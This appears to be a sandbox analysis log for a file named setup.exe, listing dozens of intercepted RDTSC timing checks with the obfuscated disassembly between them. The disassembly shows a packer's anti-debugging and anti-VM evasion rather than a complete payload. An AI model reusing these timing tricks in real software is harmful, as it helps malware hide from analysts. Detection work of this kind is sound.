Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 489009D second address: 48900A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48900A5 second address: 48900BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBA24820D9Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48900BD second address: 48900D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA2516CD51h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48900D3 second address: 48900E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov edx, eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48900E2 second address: 4890176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 and esp, FFFFFFF8h 0x00000009 jmp 00007FBA2516CD4Eh 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FBA2516CD50h 0x00000014 push eax 0x00000015 pushad 0x00000016 mov dx, D074h 0x0000001a pushad 0x0000001b mov al, bl 0x0000001d pushfd 0x0000001e jmp 00007FBA2516CD54h 0x00000023 add esi, 1A158228h 0x00000029 jmp 00007FBA2516CD4Bh 0x0000002e popfd 0x0000002f popad 0x00000030 popad 0x00000031 xchg eax, ecx 0x00000032 jmp 00007FBA2516CD56h 0x00000037 xchg eax, ebx 0x00000038 jmp 00007FBA2516CD50h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FBA2516CD4Dh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890176 second address: 489017A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 489017A second address: 4890180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890180 second address: 4890264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBA24820D9Eh 0x00000011 adc eax, 561EA948h 0x00000017 jmp 00007FBA24820D9Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FBA24820DA6h 0x00000024 xor ecx, 31C86BA8h 0x0000002a jmp 00007FBA24820D9Bh 0x0000002f popfd 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 popad 0x00000034 mov ebx, dword ptr [ebp+10h] 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FBA24820DA2h 0x0000003e add ch, 00000008h 0x00000041 jmp 00007FBA24820D9Bh 0x00000046 popfd 0x00000047 pushfd 0x00000048 jmp 00007FBA24820DA8h 0x0000004d sub cl, 00000068h 0x00000050 jmp 00007FBA24820D9Bh 0x00000055 popfd 0x00000056 popad 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 pushad 0x0000005a mov bx, si 0x0000005d push eax 0x0000005e pop edi 0x0000005f popad 0x00000060 mov ebx, ecx 0x00000062 popad 0x00000063 push eax 0x00000064 jmp 00007FBA24820D9Fh 0x00000069 xchg eax, esi 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007FBA24820DA5h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890264 second address: 4890298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FBA2516CD50h 0x00000017 xor cx, 8788h 0x0000001c jmp 00007FBA2516CD4Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890298 second address: 489029E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 489029E second address: 48902A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48902A2 second address: 48902A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48902A6 second address: 48902CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FBA2516CD58h 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48902CD second address: 489037A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBA24820DA3h 0x00000008 or si, E9DEh 0x0000000d jmp 00007FBA24820DA9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edi, esi 0x00000017 popad 0x00000018 test esi, esi 0x0000001a pushad 0x0000001b mov edx, eax 0x0000001d pushad 0x0000001e mov ax, E931h 0x00000022 jmp 00007FBA24820D9Eh 0x00000027 popad 0x00000028 popad 0x00000029 je 00007FBA96EAF08Ah 0x0000002f pushad 0x00000030 mov dx, ax 0x00000033 pushfd 0x00000034 jmp 00007FBA24820D9Ah 0x00000039 add esi, 4494EC38h 0x0000003f jmp 00007FBA24820D9Bh 0x00000044 popfd 0x00000045 popad 0x00000046 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004d jmp 00007FBA24820DA6h 0x00000052 je 00007FBA96EAF05Bh 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FBA24820D9Ah 0x00000061 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 489037A second address: 489037E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 489037E second address: 4890384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890384 second address: 48903FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBA2516CD4Dh 0x00000013 sbb eax, 08BF9EE6h 0x00000019 jmp 00007FBA2516CD51h 0x0000001e popfd 0x0000001f popad 0x00000020 or edx, dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 mov bx, si 0x00000027 pushfd 0x00000028 jmp 00007FBA2516CD58h 0x0000002d adc eax, 5C58F5B8h 0x00000033 jmp 00007FBA2516CD4Bh 0x00000038 popfd 0x00000039 popad 0x0000003a test edx, 61000000h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 mov edi, ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48903FF second address: 4890438 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 358F5A3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a movsx edi, ax 0x0000000d pop ecx 0x0000000e popad 0x0000000f jne 00007FBA96EAF010h 0x00000015 jmp 00007FBA24820DA1h 0x0000001a test byte ptr [esi+48h], 00000001h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBA24820D9Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890438 second address: 489047D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBA977FAF9Ah 0x0000000f jmp 00007FBA2516CD4Eh 0x00000014 test bl, 00000007h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FBA2516CD57h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48807C8 second address: 4880822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007FBA24820D9Ch 0x00000011 mov cx, 76A1h 0x00000015 popad 0x00000016 and esp, FFFFFFF8h 0x00000019 jmp 00007FBA24820D9Ch 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBA24820DA7h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880822 second address: 488083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 488083A second address: 48808F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, 2B3F316Ah 0x00000012 mov cx, di 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 jmp 00007FBA24820DA3h 0x0000001d mov si, DF1Fh 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 jmp 00007FBA24820DA2h 0x00000028 push eax 0x00000029 pushad 0x0000002a mov bx, 0534h 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FBA24820DA3h 0x00000035 adc esi, 490C84CEh 0x0000003b jmp 00007FBA24820DA9h 0x00000040 popfd 0x00000041 call 00007FBA24820DA0h 0x00000046 pop eax 0x00000047 popad 0x00000048 popad 0x00000049 xchg eax, esi 0x0000004a jmp 00007FBA24820DA1h 0x0000004f mov esi, dword ptr [ebp+08h] 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 movsx edx, cx 0x00000058 mov cx, 5BCBh 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48808F1 second address: 48808F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48808F7 second address: 48808FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48808FB second address: 488090C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 488090C second address: 4880961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FBA24820D9Ch 0x0000000b or ecx, 6EC99208h 0x00000011 jmp 00007FBA24820D9Bh 0x00000016 popfd 0x00000017 popad 0x00000018 test esi, esi 0x0000001a pushad 0x0000001b mov bx, si 0x0000001e movzx esi, bx 0x00000021 popad 0x00000022 je 00007FBA96EB67E9h 0x00000028 jmp 00007FBA24820DA3h 0x0000002d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880961 second address: 488097C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 488097C second address: 48809AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c mov dl, ch 0x0000000e movsx ebx, ax 0x00000011 popad 0x00000012 je 00007FBA96EB6797h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48809AE second address: 48809B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48809B2 second address: 48809B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48809B6 second address: 48809BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48809BC second address: 48809C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48809C2 second address: 48809C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48809C6 second address: 48809CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48809CA second address: 48809F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FA6968h], 00000002h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBA2516CD59h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48809F4 second address: 4880A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBA96EB6743h 0x0000000f jmp 00007FBA24820D9Eh 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 jmp 00007FBA24820DA0h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FBA24820DA7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880A4A second address: 4880A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FBA2516CD58h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880A6F second address: 4880AA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b jmp 00007FBA24820D9Eh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007FBA24820D9Ch 0x00000017 mov dword ptr [esp], ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880AA8 second address: 4880AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880AAC second address: 4880AC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880AC9 second address: 4880ACF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880ACF second address: 4880AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880AD3 second address: 4880AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880AD7 second address: 4880AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820DA2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880B3B second address: 4880B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880B41 second address: 4880B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c mov edi, esi 0x0000000e mov ax, BABFh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007FBA24820DA2h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880B6E second address: 4880BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebx 0x0000000b jmp 00007FBA2516CD56h 0x00000010 mov esp, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FBA2516CD4Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880BA5 second address: 4880BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4880BAB second address: 4880BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD4Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890AE1 second address: 4890AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890AFC second address: 4890B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890B02 second address: 4890B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890B06 second address: 4890B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890B13 second address: 4890B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, 40h 0x00000006 popad 0x00000007 movsx edx, ax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, ebx 0x00000011 pushfd 0x00000012 jmp 00007FBA24820DA5h 0x00000017 sbb cl, 00000046h 0x0000001a jmp 00007FBA24820DA1h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4890B50 second address: 4890B6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49107EC second address: 491080E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820D9Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 491080E second address: 4910814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4910814 second address: 4910818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49009C3 second address: 49009C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49009C8 second address: 49009CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 49009CE second address: 4900A66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FBA2516CD51h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FBA2516CD4Ch 0x00000019 sub al, FFFFFFB8h 0x0000001c jmp 00007FBA2516CD4Bh 0x00000021 popfd 0x00000022 pushad 0x00000023 mov edi, eax 0x00000025 pushfd 0x00000026 jmp 00007FBA2516CD52h 0x0000002b add ecx, 4FC2CB18h 0x00000031 jmp 00007FBA2516CD4Bh 0x00000036 popfd 0x00000037 popad 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b jmp 00007FBA2516CD56h 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4900A66 second address: 4900A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4900A6A second address: 4900A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4900A6E second address: 4900A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4900CE9 second address: 4900D7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBA2516CD57h 0x00000011 sub cx, E54Eh 0x00000016 jmp 00007FBA2516CD59h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e jmp 00007FBA2516CD4Dh 0x00000023 mov ebp, esp 0x00000025 jmp 00007FBA2516CD4Eh 0x0000002a push dword ptr [ebp+0Ch] 0x0000002d jmp 00007FBA2516CD50h 0x00000032 push dword ptr [ebp+08h] 0x00000035 pushad 0x00000036 mov ecx, 1727EC7Dh 0x0000003b call 00007FBA2516CD4Ah 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4900D7E second address: 4900D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 call 00007FBA24820D99h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820D9Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4900D99 second address: 4900D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4900D9F second address: 4900DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4900DA3 second address: 4900DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4900DB1 second address: 4900DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBA24820D9Bh 0x0000000a sbb ax, FACEh 0x0000000f jmp 00007FBA24820DA9h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4900DE1 second address: 4900E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FBA2516CD51h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 mov bh, ch 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007FBA2516CD54h 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FBA2516CD4Dh 0x0000002b sub al, FFFFFFC6h 0x0000002e jmp 00007FBA2516CD51h 0x00000033 popfd 0x00000034 jmp 00007FBA2516CD50h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 976324 second address: 976329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97651A second address: 976524 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48B06BC second address: 48B06C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48B06C0 second address: 48B06C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
